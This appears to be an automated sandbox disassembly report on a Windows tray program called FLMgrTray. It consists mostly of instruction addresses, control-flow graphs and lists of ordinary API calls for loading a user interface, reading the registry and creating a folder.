                                                                                        0x0016d2fd
                                                                                        0x0016d304
                                                                                        0x0016d30a
                                                                                        0x0016d312
                                                                                        0x0016d31a
                                                                                        0x0016d320
                                                                                        0x0016d325
                                                                                        0x0016d32b
                                                                                        0x0016d337
                                                                                        0x0016d33e
                                                                                        0x0016d341
                                                                                        0x0016d345
                                                                                        0x0016d348
                                                                                        0x0016d34c
                                                                                        0x0016d351
                                                                                        0x0016d356
                                                                                        0x0016d35b
                                                                                        0x0016d35f
                                                                                        0x0016d363
                                                                                        0x0016d367
                                                                                        0x0016d370
                                                                                        0x0016d373
                                                                                        0x0016d37c
                                                                                        0x0016d380
                                                                                        0x0016d384
                                                                                        0x0016d38d
                                                                                        0x0016d391
                                                                                        0x0016d396
                                                                                        0x0016d39d
                                                                                        0x0016d3a5
                                                                                        0x0016d3aa
                                                                                        0x0016d3af
                                                                                        0x0016d3b7
                                                                                        0x0016d3bb
                                                                                        0x0016d3bf
                                                                                        0x0016d3c3
                                                                                        0x0016d3c6
                                                                                        0x0016d3ce
                                                                                        0x0016d3d1
                                                                                        0x0016d3d5
                                                                                        0x0016d3d9
                                                                                        0x0016d3de
                                                                                        0x0016d3e3
                                                                                        0x0016d3e7
                                                                                        0x0016d3eb
                                                                                        0x0016d3ef
                                                                                        0x0016d3f2
                                                                                        0x0016d3f6
                                                                                        0x0016d3fa
                                                                                        0x0016d403
                                                                                        0x0016d407
                                                                                        0x0016d40c
                                                                                        0x0016d411
                                                                                        0x0016d416
                                                                                        0x0016d41e
                                                                                        0x0016d422
                                                                                        0x0016d42a
                                                                                        0x0016d42e
                                                                                        0x0016d436
                                                                                        0x0016d436
                                                                                        0x0016d440
                                                                                        0x0016d45f
                                                                                        0x0016d467
                                                                                        0x0016d468
                                                                                        0x0016d440
                                                                                        0x0016d46f
                                                                                        0x0016d479
                                                                                        0x0016d47f
                                                                                        0x0016d489
                                                                                        0x0016d490
                                                                                        0x0016d493
                                                                                        0x0016d493
                                                                                        0x0016d496
                                                                                        0x0016d499
                                                                                        0x0016d4a8
                                                                                        0x0016d4b0
                                                                                        0x0016d4bd
                                                                                        0x0016d4c4
                                                                                        0x0016d4c9
                                                                                        0x0016d4cd
                                                                                        0x0016d4d4
                                                                                        0x0016d4da
                                                                                        0x0016d4dc
                                                                                        0x0016d4e0
                                                                                        0x0016d4ff
                                                                                        0x0016d507
                                                                                        0x0016d508
                                                                                        0x0016d4e0
                                                                                        0x0016d50f
                                                                                        0x0016d519
                                                                                        0x0016d51f
                                                                                        0x0016d529
                                                                                        0x0016d530
                                                                                        0x0016d533
                                                                                        0x0016d533
                                                                                        0x0016d536
                                                                                        0x0016d539
                                                                                        0x0016d548
                                                                                        0x0016d550
                                                                                        0x0016d560
                                                                                        0x0016d567
                                                                                        0x0016d56c
                                                                                        0x0016d57d
                                                                                        0x0016d58a
                                                                                        0x0016d592
                                                                                        0x0016d59c
                                                                                        0x0016d5a2
                                                                                        0x0016d5ac
                                                                                        0x0016d5b3
                                                                                        0x0016d5b6
                                                                                        0x0016d5b6
                                                                                        0x0016d5b9
                                                                                        0x0016d5bc
                                                                                        0x0016d5cb
                                                                                        0x0016d5d3
                                                                                        0x0016d5d8
                                                                                        0x0016d5de
                                                                                        0x0016d5e2
                                                                                        0x0016d5e7
                                                                                        0x0016de18
                                                                                        0x00000000
                                                                                        0x0016d5ed
                                                                                        0x0016d5ed
                                                                                        0x0016d5f3
                                                                                        0x0016d5fb
                                                                                        0x0016d63a
                                                                                        0x0016d646
                                                                                        0x0016de1d
                                                                                        0x0016de1d
                                                                                        0x0016de22
                                                                                        0x0016de23
                                                                                        0x0016de24
                                                                                        0x0016de25
                                                                                        0x0016de26
                                                                                        0x0016de27
                                                                                        0x0016de28
                                                                                        0x0016de29
                                                                                        0x0016de2a
                                                                                        0x0016de2b
                                                                                        0x0016de2c
                                                                                        0x0016de2d
                                                                                        0x0016de2e
                                                                                        0x0016de2f
                                                                                        0x0016de30
                                                                                        0x0016de31
                                                                                        0x0016de33
                                                                                        0x0016de35
                                                                                        0x0016de40
                                                                                        0x0016de44
                                                                                        0x0016de49
                                                                                        0x0016de4b
                                                                                        0x0016de4e
                                                                                        0x0016de4f
                                                                                        0x0016de53
                                                                                        0x0016de5c
                                                                                        0x0016de63
                                                                                        0x0016de70
                                                                                        0x0016de74
                                                                                        0x0016de79
                                                                                        0x0016de80
                                                                                        0x0016de89
                                                                                        0x0016de8d
                                                                                        0x0016de94
                                                                                        0x0016de98
                                                                                        0x0016dea0
                                                                                        0x0016dea5
                                                                                        0x0016dfd0
                                                                                        0x0016dfef
                                                                                        0x0016dff4
                                                                                        0x0016deab
                                                                                        0x0016deab
                                                                                        0x0016deb7
                                                                                        0x0016debe
                                                                                        0x0016dec5
                                                                                        0x0016dece
                                                                                        0x0016ded2
                                                                                        0x0016ded2
                                                                                        0x0016ded9
                                                                                        0x0016dede
                                                                                        0x0016dee2
                                                                                        0x0016dee5
                                                                                        0x0016dee8
                                                                                        0x0016deec
                                                                                        0x0016def0
                                                                                        0x0016def5
                                                                                        0x0016defa
                                                                                        0x0016defe
                                                                                        0x0016df02
                                                                                        0x0016df06
                                                                                        0x0016df09
                                                                                        0x0016df0d
                                                                                        0x0016df11
                                                                                        0x0016df16
                                                                                        0x0016df1a
                                                                                        0x0016df1f
                                                                                        0x0016df24
                                                                                        0x0016df29
                                                                                        0x0016df31
                                                                                        0x0016df35
                                                                                        0x0016df3b
                                                                                        0x0016df3f
                                                                                        0x0016df43
                                                                                        0x0016df48
                                                                                        0x0016df4e
                                                                                        0x0016df52
                                                                                        0x0016df55
                                                                                        0x0016df58
                                                                                        0x0016df5c
                                                                                        0x0016df60
                                                                                        0x0016df65
                                                                                        0x0016df6a
                                                                                        0x0016df6e
                                                                                        0x0016df72
                                                                                        0x0016df76
                                                                                        0x0016df79
                                                                                        0x0016df7d
                                                                                        0x0016df81
                                                                                        0x0016df86
                                                                                        0x0016df8a
                                                                                        0x0016df8f
                                                                                        0x0016df94
                                                                                        0x0016df99
                                                                                        0x0016dfa1
                                                                                        0x0016dfa5
                                                                                        0x0016dfab
                                                                                        0x0016dfaf
                                                                                        0x0016dfb5
                                                                                        0x0016dfb8
                                                                                        0x0016dfc4
                                                                                        0x0016dfc6
                                                                                        0x0016dfd0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016dfd0
                                                                                        0x0016dfc4
                                                                                        0x0016e00a
                                                                                        0x0016e016
                                                                                        0x0016e022
                                                                                        0x00000000
                                                                                        0x0016e024
                                                                                        0x0016e024
                                                                                        0x0016e022
                                                                                        0x0016e030
                                                                                        0x0016e035
                                                                                        0x0016e03b
                                                                                        0x0016e03d
                                                                                        0x0016e040
                                                                                        0x0016e047
                                                                                        0x0016e04f
                                                                                        0x0016e051
                                                                                        0x0016e054
                                                                                        0x0016e05f
                                                                                        0x0016e061
                                                                                        0x0016e061
                                                                                        0x0016e05f
                                                                                        0x0016e067
                                                                                        0x0016e069
                                                                                        0x0016e06e
                                                                                        0x0016e076
                                                                                        0x0016e08c
                                                                                        0x0016d64c
                                                                                        0x0016d64c
                                                                                        0x0016d64c
                                                                                        0x0016d651
                                                                                        0x0016d657
                                                                                        0x0016d65c
                                                                                        0x0016d664
                                                                                        0x0016d666
                                                                                        0x0016d66a
                                                                                        0x0016d677
                                                                                        0x0016d66c
                                                                                        0x0016d66c
                                                                                        0x0016d66c
                                                                                        0x0016d65e
                                                                                        0x0016d65e
                                                                                        0x0016d65e
                                                                                        0x0016d67a
                                                                                        0x0016d684
                                                                                        0x0016d689
                                                                                        0x0016d68c
                                                                                        0x0016d692
                                                                                        0x0016d694
                                                                                        0x0016d6a1
                                                                                        0x0016d6a7
                                                                                        0x0016d6a8
                                                                                        0x0016d719
                                                                                        0x0016d71e
                                                                                        0x0016d724
                                                                                        0x0016d727
                                                                                        0x0016d72d
                                                                                        0x0016d733
                                                                                        0x0016d73a
                                                                                        0x0016d6aa
                                                                                        0x0016d6b1
                                                                                        0x0016d6bc
                                                                                        0x0016d6bf
                                                                                        0x0016d6c5
                                                                                        0x0016d6d2
                                                                                        0x0016d6d9
                                                                                        0x0016d6e1
                                                                                        0x0016d6e3
                                                                                        0x0016d6e6
                                                                                        0x0016d6f1
                                                                                        0x0016d6f3
                                                                                        0x0016d6f3
                                                                                        0x0016d6f1
                                                                                        0x0016d6f9
                                                                                        0x0016d6fb
                                                                                        0x0016d700
                                                                                        0x0016d706
                                                                                        0x0016d709
                                                                                        0x0016d709
                                                                                        0x00000000
                                                                                        0x0016d6a8
                                                                                        0x0016d5fd
                                                                                        0x0016d5fd
                                                                                        0x0016d603
                                                                                        0x0016d60f
                                                                                        0x0016d616
                                                                                        0x0016d623
                                                                                        0x0016d629
                                                                                        0x0016d62f
                                                                                        0x0016d73c
                                                                                        0x0016d73e
                                                                                        0x0016d742
                                                                                        0x0016d758
                                                                                        0x0016d763
                                                                                        0x0016d76d
                                                                                        0x0016d777
                                                                                        0x0016d78c
                                                                                        0x0016d796
                                                                                        0x0016d7a8
                                                                                        0x0016d7c0
                                                                                        0x0016d7c9
                                                                                        0x0016d7cf
                                                                                        0x0016d7d5
                                                                                        0x0016d7d7
                                                                                        0x0016d7dd
                                                                                        0x0016d7e4
                                                                                        0x0016d7e6
                                                                                        0x0016d7ec
                                                                                        0x0016d7f3
                                                                                        0x0016d7fb
                                                                                        0x0016d7fd
                                                                                        0x0016d800
                                                                                        0x0016d80b
                                                                                        0x0016d80d
                                                                                        0x0016d80d
                                                                                        0x0016d80b
                                                                                        0x0016d813
                                                                                        0x0016d815
                                                                                        0x0016d81a
                                                                                        0x0016d81a
                                                                                        0x0016d81f
                                                                                        0x0016d829
                                                                                        0x0016d833
                                                                                        0x0016d83d
                                                                                        0x0016d849
                                                                                        0x0016d850
                                                                                        0x0016d857
                                                                                        0x0016d882
                                                                                        0x0016d888
                                                                                        0x0016d890
                                                                                        0x0016d890
                                                                                        0x0016d893
                                                                                        0x0016d896
                                                                                        0x0016d8ac
                                                                                        0x0016d8b5
                                                                                        0x0016d8b7
                                                                                        0x0016d8b9
                                                                                        0x0016d8c1
                                                                                        0x0016d8d8
                                                                                        0x0016d8e5
                                                                                        0x0016d8ef
                                                                                        0x0016d8f8
                                                                                        0x0016d8fb
                                                                                        0x0016d8c3
                                                                                        0x0016d8c5
                                                                                        0x0016d8c7
                                                                                        0x0016d8d0
                                                                                        0x0016d8d3
                                                                                        0x0016d8d6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016d8d6
                                                                                        0x0016d8c7
                                                                                        0x0016d8c1
                                                                                        0x0016d901
                                                                                        0x0016d901
                                                                                        0x0016d907
                                                                                        0x0016d90a
                                                                                        0x0016d910
                                                                                        0x0016d910
                                                                                        0x0016d913
                                                                                        0x0016d916
                                                                                        0x0016d91b
                                                                                        0x0016d932
                                                                                        0x0016d93b
                                                                                        0x0016d93d
                                                                                        0x0016d93f
                                                                                        0x0016d947
                                                                                        0x0016d961
                                                                                        0x0016d96e
                                                                                        0x0016d978
                                                                                        0x0016d981
                                                                                        0x0016d949
                                                                                        0x0016d94b
                                                                                        0x0016d950
                                                                                        0x0016d959
                                                                                        0x0016d95c
                                                                                        0x0016d95f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016d95f
                                                                                        0x0016d950
                                                                                        0x0016d947
                                                                                        0x0016d984
                                                                                        0x0016d984
                                                                                        0x0016d98a
                                                                                        0x0016d990
                                                                                        0x0016d990
                                                                                        0x0016d993
                                                                                        0x0016d996
                                                                                        0x0016d99b
                                                                                        0x0016d9b2
                                                                                        0x0016d9bb
                                                                                        0x0016d9bd
                                                                                        0x0016d9bf
                                                                                        0x0016d9c7
                                                                                        0x0016d9e1
                                                                                        0x0016d9ee
                                                                                        0x0016d9f8
                                                                                        0x0016da01
                                                                                        0x0016d9c9
                                                                                        0x0016d9cb
                                                                                        0x0016d9d0
                                                                                        0x0016d9d9
                                                                                        0x0016d9dc
                                                                                        0x0016d9df
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016d9df
                                                                                        0x0016d9d0
                                                                                        0x0016d9c7
                                                                                        0x0016da04
                                                                                        0x0016da04
                                                                                        0x0016da0a
                                                                                        0x0016da10
                                                                                        0x0016da10
                                                                                        0x0016da13
                                                                                        0x0016da16
                                                                                        0x0016da1b
                                                                                        0x0016da32
                                                                                        0x0016da3b
                                                                                        0x0016da3d
                                                                                        0x0016da3f
                                                                                        0x0016da47
                                                                                        0x0016da61
                                                                                        0x0016da6e
                                                                                        0x0016da78
                                                                                        0x0016da81
                                                                                        0x0016da49
                                                                                        0x0016da4b
                                                                                        0x0016da50
                                                                                        0x0016da59
                                                                                        0x0016da5c
                                                                                        0x0016da5f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016da5f
                                                                                        0x0016da50
                                                                                        0x0016da47
                                                                                        0x0016da84
                                                                                        0x0016da84
                                                                                        0x0016da8a
                                                                                        0x0016da90
                                                                                        0x0016da90
                                                                                        0x0016da93
                                                                                        0x0016da96
                                                                                        0x0016da9b
                                                                                        0x0016dab2
                                                                                        0x0016dabb
                                                                                        0x0016dabd
                                                                                        0x0016dabf
                                                                                        0x0016dac7
                                                                                        0x0016dae1
                                                                                        0x0016daee
                                                                                        0x0016daf8
                                                                                        0x0016db01
                                                                                        0x0016dac9
                                                                                        0x0016dacb
                                                                                        0x0016dad0
                                                                                        0x0016dad9
                                                                                        0x0016dadc
                                                                                        0x0016dadf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016dadf
                                                                                        0x0016dad0
                                                                                        0x0016dac7
                                                                                        0x0016db04
                                                                                        0x0016db04
                                                                                        0x0016db0a
                                                                                        0x0016db10
                                                                                        0x0016db10
                                                                                        0x0016db13
                                                                                        0x0016db16
                                                                                        0x0016db1b
                                                                                        0x0016db32
                                                                                        0x0016db3b
                                                                                        0x0016db3d
                                                                                        0x0016db3f
                                                                                        0x0016db47
                                                                                        0x0016db61
                                                                                        0x0016db6e
                                                                                        0x0016db78
                                                                                        0x0016db81
                                                                                        0x0016db49
                                                                                        0x0016db4b
                                                                                        0x0016db50
                                                                                        0x0016db59
                                                                                        0x0016db5c
                                                                                        0x0016db5f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016db5f
                                                                                        0x0016db50
                                                                                        0x0016db47
                                                                                        0x0016db84
                                                                                        0x0016d859
                                                                                        0x0016d869
                                                                                        0x0016d87b
                                                                                        0x0016d87b
                                                                                        0x0016d869
                                                                                        0x0016db97
                                                                                        0x0016db9d
                                                                                        0x0016dbab
                                                                                        0x0016dbc4
                                                                                        0x0016dbcb
                                                                                        0x0016dbd5
                                                                                        0x0016dbed
                                                                                        0x0016dbf7
                                                                                        0x0016dc0f
                                                                                        0x0016dc19
                                                                                        0x0016dc31
                                                                                        0x0016dc3b
                                                                                        0x0016dc53
                                                                                        0x0016dc5d
                                                                                        0x0016dc75
                                                                                        0x0016dc7f
                                                                                        0x0016dc84
                                                                                        0x0016dc91
                                                                                        0x0016dc93
                                                                                        0x0016dc93
                                                                                        0x0016dc91
                                                                                        0x0016dc9d
                                                                                        0x0016dca6
                                                                                        0x0016dca8
                                                                                        0x0016dcae
                                                                                        0x0016dcb5
                                                                                        0x0016dcbd
                                                                                        0x0016dcbf
                                                                                        0x0016dcc2
                                                                                        0x0016dccd
                                                                                        0x0016dccf
                                                                                        0x0016dccf
                                                                                        0x0016dccd
                                                                                        0x0016dcd5
                                                                                        0x0016dcd7
                                                                                        0x0016dcdc
                                                                                        0x0016dcdc
                                                                                        0x0016dcdf
                                                                                        0x0016dce8
                                                                                        0x0016dcea
                                                                                        0x0016dcf0
                                                                                        0x0016dcf7
                                                                                        0x0016dcff
                                                                                        0x0016dd01
                                                                                        0x0016dd04
                                                                                        0x0016dd0f
                                                                                        0x0016dd11
                                                                                        0x0016dd11
                                                                                        0x0016dd0f
                                                                                        0x0016dd17
                                                                                        0x0016dd19
                                                                                        0x0016dd1e
                                                                                        0x0016dd1e
                                                                                        0x0016dd21
                                                                                        0x0016dd2a
                                                                                        0x0016dd2c
                                                                                        0x0016dd32
                                                                                        0x0016dd39
                                                                                        0x0016dd41
                                                                                        0x0016dd43
                                                                                        0x0016dd46
                                                                                        0x0016dd51
                                                                                        0x0016dd53
                                                                                        0x0016dd53
                                                                                        0x0016dd51
                                                                                        0x0016dd59
                                                                                        0x0016dd5b
                                                                                        0x0016dd60
                                                                                        0x0016dd60
                                                                                        0x0016dd63
                                                                                        0x0016dd6c
                                                                                        0x0016dd6e
                                                                                        0x0016dd74
                                                                                        0x0016dd7b
                                                                                        0x0016dd83
                                                                                        0x0016dd85
                                                                                        0x0016dd88
                                                                                        0x0016dd93
                                                                                        0x0016dd95
                                                                                        0x0016dd95
                                                                                        0x0016dd93
                                                                                        0x0016dd9b
                                                                                        0x0016dd9d
                                                                                        0x0016dda2
                                                                                        0x0016dda2
                                                                                        0x0016dda5
                                                                                        0x0016ddae
                                                                                        0x0016ddb0
                                                                                        0x0016ddb6
                                                                                        0x0016ddbd
                                                                                        0x0016ddc5
                                                                                        0x0016ddc7
                                                                                        0x0016ddca
                                                                                        0x0016ddd5
                                                                                        0x0016ddd7
                                                                                        0x0016ddd7
                                                                                        0x0016ddd5
                                                                                        0x0016dddd
                                                                                        0x0016dddf
                                                                                        0x0016dde4
                                                                                        0x0016dded
                                                                                        0x0016ddf8
                                                                                        0x0016de00
                                                                                        0x0016de17
                                                                                        0x0016de17
                                                                                        0x0016d5fb
                                                                                        0x0016d090
                                                                                        0x0016d0af
                                                                                        0x0016d0b7
                                                                                        0x0016d0bb
                                                                                        0x00000000
                                                                                        0x0016d0bd
                                                                                        0x0016d0bf
                                                                                        0x0016d0c9
                                                                                        0x0016d0cf
                                                                                        0x0016d0d9
                                                                                        0x0016d0e0
                                                                                        0x0016d0e0
                                                                                        0x00000000
                                                                                        0x0016cf24
                                                                                        0x0016cf24
                                                                                        0x0016cf27
                                                                                        0x0016cf2d
                                                                                        0x00000000
                                                                                        0x0016cf2f
                                                                                        0x0016cf39
                                                                                        0x0016cf41
                                                                                        0x0016cf46
                                                                                        0x0016cf4d
                                                                                        0x0016cf53
                                                                                        0x0016cf55
                                                                                        0x0016cf59
                                                                                        0x0016cf60
                                                                                        0x0016cf67
                                                                                        0x0016cf6f
                                                                                        0x0016cf7a
                                                                                        0x0016cf80
                                                                                        0x0016cf8c
                                                                                        0x0016cf93
                                                                                        0x0016cf96
                                                                                        0x0016cf9a
                                                                                        0x0016cf9d
                                                                                        0x0016cfa1
                                                                                        0x0016cfa6
                                                                                        0x0016cfab
                                                                                        0x0016cfb0
                                                                                        0x0016cfb4
                                                                                        0x0016cfb8
                                                                                        0x0016cfbc
                                                                                        0x0016cfc5
                                                                                        0x0016cfc8
                                                                                        0x0016cfd1
                                                                                        0x0016cfd5
                                                                                        0x0016cfd9
                                                                                        0x0016cfe2
                                                                                        0x0016cfe6
                                                                                        0x0016cfeb
                                                                                        0x0016cff2
                                                                                        0x0016cffa
                                                                                        0x0016cfff
                                                                                        0x0016d004
                                                                                        0x0016d00c
                                                                                        0x0016d010
                                                                                        0x0016d014
                                                                                        0x0016d018
                                                                                        0x0016d01b
                                                                                        0x0016d023
                                                                                        0x0016d026
                                                                                        0x0016d02a
                                                                                        0x0016d02e
                                                                                        0x0016d033
                                                                                        0x0016d038
                                                                                        0x0016d03c
                                                                                        0x0016d040
                                                                                        0x0016d044
                                                                                        0x0016d047
                                                                                        0x0016d04b
                                                                                        0x0016d04f
                                                                                        0x0016d058
                                                                                        0x0016d05c
                                                                                        0x0016d061
                                                                                        0x0016d066
                                                                                        0x0016d06b
                                                                                        0x0016d073
                                                                                        0x0016d077
                                                                                        0x0016d07f
                                                                                        0x0016d083
                                                                                        0x0016d083
                                                                                        0x0016cf7a
                                                                                        0x00000000
                                                                                        0x0016cd13
                                                                                        0x0016cd32
                                                                                        0x0016cd3a
                                                                                        0x0016cd3e
                                                                                        0x00000000
                                                                                        0x0016cd40
                                                                                        0x0016cd42
                                                                                        0x0016cd4c
                                                                                        0x0016cd52
                                                                                        0x0016cd5c
                                                                                        0x0016cd63
                                                                                        0x0016cd63
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: G%A$^<*.*
                                                                                        • API String ID: 0-1268062912
                                                                                        • Opcode ID: fbbb46a7322039a7659ec903c26e8315860fd249dda08e48813e3f7994de477a
                                                                                        • Instruction ID: 98e0da7a0554cc2d16c816ec4a93823e4e5016cc9b3580a0290cd26de415d1ee
                                                                                        • Opcode Fuzzy Hash: fbbb46a7322039a7659ec903c26e8315860fd249dda08e48813e3f7994de477a
                                                                                        • Instruction Fuzzy Hash: C2A21335E106588ADB169B34DC597E9F3B4AF6A345F14C39AE808B3661EB306BD1CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 836 16bfb7-16bfb9 837 16c021 836->837 838 16bfbb-16bfc9 836->838 839 16c02b-16c054 837->839 840 16bfd0-16bfd6 838->840 841 16c170-16c194 839->841 842 16c05a-16c07d 839->842 840->839 843 16bfd8-16bfdc 840->843 841->841 845 16c196-16c1fa call 181b20 call 17eb60 call 175703 call 16c560 call 171b10 _time64 call 16e090 841->845 844 16c081-16c162 842->844 846 16bfe0-16bfe3 843->846 844->844 850 16c168-16c16b 844->850 872 16c200-16c22c ?SetInstance@CPaintManagerUI@DuiLib@@SAXPAUHINSTANCE__@@@Z ?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@@XZ FindResourceW 845->872 873 16c341-16c34c call 1745a0 845->873 848 16bfe5-16bfeb 846->848 849 16bfef-16bff1 846->849 848->846 852 16bfed 848->852 849->839 853 16bff3-16bffa 849->853 850->845 854 16c16d 850->854 852->839 856 16c017-16c01f 853->856 857 16bffc-16c000 853->857 854->841 856->837 856->839 859 16c002-16c009 857->859 861 16c1be-16c1c7 859->861 862 16c00f-16c015 859->862 861->840 862->856 862->859 874 16c291-16c302 call 1623b0 ?Create@CWindowWnd@DuiLib@@QAEPAUHWND__@@PAU3@PB_WKKHHHHPAUHMENU__@@@Z ?ShowModal@CWindowWnd@DuiLib@@QAEIXZ call 1624a0 _time64 call 1733e0 872->874 875 16c22e-16c24c ?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@@XZ LoadResource ?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@@XZ SizeofResource 872->875 881 16c352-16c359 Sleep 873->881 889 16bef8-16bf0a call 1755f4 874->889 890 16c308-16c31a 874->890 875->874 877 16c24e-16c282 LockResource call 164940 875->877 877->874 885 16c284-16c28e ?SetResourceZip@CPaintManagerUI@DuiLib@@SAXPAXIPB_W@Z 877->885 881->881 885->874 892 16c332-16c33c call 175733 890->892 893 16c31c-16c32a 890->893 892->889 893->892 896 16c32c _invalid_parameter_noinfo_noreturn 893->896 896->892
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: TrayIconWnd$ZIPRES$6Y
                                                                                        • API String ID: 0-757822346
                                                                                        • Opcode ID: c85b2b9a2ecbd06c1724d345790a3b84e703b24e65045767f24df88bc59cb640
                                                                                        • Instruction ID: 8e4cb889d1fcec868bbb4ab9b7019e65866a735b96782719fc47d444207a1924
                                                                                        • Opcode Fuzzy Hash: c85b2b9a2ecbd06c1724d345790a3b84e703b24e65045767f24df88bc59cb640
                                                                                        • Instruction Fuzzy Hash: C6914A35D103448BDB12AB74DC557A9B375AF67344F11C32AF845B6662FB30AAD2CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 898 17eb60-17ebcb call 17f670 memset SHGetFolderPathW 901 17ebd0-17ebd9 898->901 901->901 902 17ebdb-17ec37 call 163540 call 182540 call 183380 901->902 909 17ed60-17ed87 902->909 910 17ec3d-17ec5a 902->910 909->909 912 17ed89-17ed9d call 182cc0 909->912 911 17ec60-17ed4d 910->911 911->911 913 17ed53-17ed56 911->913 917 17eda3-17edde 912->917 918 17f09e-17f0df call 183380 912->918 913->912 915 17ed58 913->915 915->909 919 17eee7-17ef0e 917->919 920 17ede4-17eedf 917->920 925 17f0e5-17f10c 918->925 926 17f210-17f237 918->926 919->919 922 17ef10-17ef31 call 183280 919->922 920->919 930 17ef67-17ef70 922->930 931 17ef33-17ef64 call 163190 922->931 929 17f110-17f1fd 925->929 926->926 927 17f239-17f24d call 182cc0 926->927 942 17f497-17f4e4 memset GetModuleFileNameW 927->942 943 17f253-17f279 927->943 929->929 932 17f203-17f206 929->932 936 17ef72-17ef87 930->936 937 17efa9-17efca 930->937 931->930 932->927 935 17f208 932->935 935->926 940 17ef9f-17efa6 call 175733 936->940 941 17ef89-17ef97 936->941 944 17efd1-17eff8 937->944 940->937 941->940 945 17ef99 _invalid_parameter_noinfo_noreturn 941->945 949 17f4e7-17f4f0 942->949 946 17f27f-17f284 943->946 947 17f3b9-17f3cd call 183280 943->947 944->944 950 17effa-17f00e call 183280 944->950 945->940 951 17f390-17f3b7 946->951 952 17f28a-17f38d 946->952 957 17f3d2-17f3da 947->957 949->949 955 17f4f2-17f52e call 163540 call 1768d0 949->955 959 17f013-17f01b 950->959 951->947 951->951 952->951 981 17f567-17f57d 955->981 982 17f530-17f545 955->982 960 17f410-17f419 957->960 961 17f3dc-17f40d call 163190 957->961 963 17f051-17f05a 959->963 964 17f01d-17f04e call 163190 959->964 967 17f452-17f479 call 1827b0 PathIsDirectoryW 960->967 968 17f41b-17f430 960->968 961->960 969 17f093-17f099 call 1827b0 963->969 970 17f05c-17f071 963->970 964->963 967->942 993 17f47b-17f491 CreateDirectoryW 967->993 974 17f432-17f440 968->974 975 17f448-17f44f call 175733 968->975 969->918 976 17f073-17f081 970->976 977 17f089-17f090 call 175733 970->977 974->975 983 17f442 _invalid_parameter_noinfo_noreturn 974->983 975->967 976->977 985 17f083 _invalid_parameter_noinfo_noreturn 976->985 977->969 992 17f584-17f5ab 981->992 988 17f547-17f555 982->988 989 17f55d-17f564 call 175733 982->989 983->975 985->977 988->989 994 17f557 _invalid_parameter_noinfo_noreturn 988->994 989->981 992->992 996 17f5ad-17f5d0 call 176cc0 992->996 993->942 994->989 1000 17f606-17f60f 996->1000 1001 17f5d2-17f603 call 163190 996->1001 1002 17f611-17f626 1000->1002 1003 17f648-17f66f call 182670 call 1755f4 1000->1003 1001->1000 1005 17f63e-17f645 call 175733 1002->1005 1006 17f628-17f636 1002->1006 1005->1003 1006->1005 1009 17f638 _invalid_parameter_noinfo_noreturn 1006->1009 1009->1005
                                                                                        APIs
                                                                                          • Part of subcall function 0017F670: GetModuleHandleW.KERNEL32(?,?,00000001), ref: 0017F800
                                                                                        • memset.VCRUNTIME140(?,00000000,00000208,2C80D730,?,00000001), ref: 0017EBA5
                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?,2C80D730,?,00000001), ref: 0017EBBC
                                                                                          • Part of subcall function 00182CC0: memmove.VCRUNTIME140(?,00000000,00000000), ref: 00182D7F
                                                                                          • Part of subcall function 00182CC0: RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 00182DB6
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,80000001,80000001,?,?), ref: 0017EF99
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,80000001,80000001,?,?), ref: 0017F083
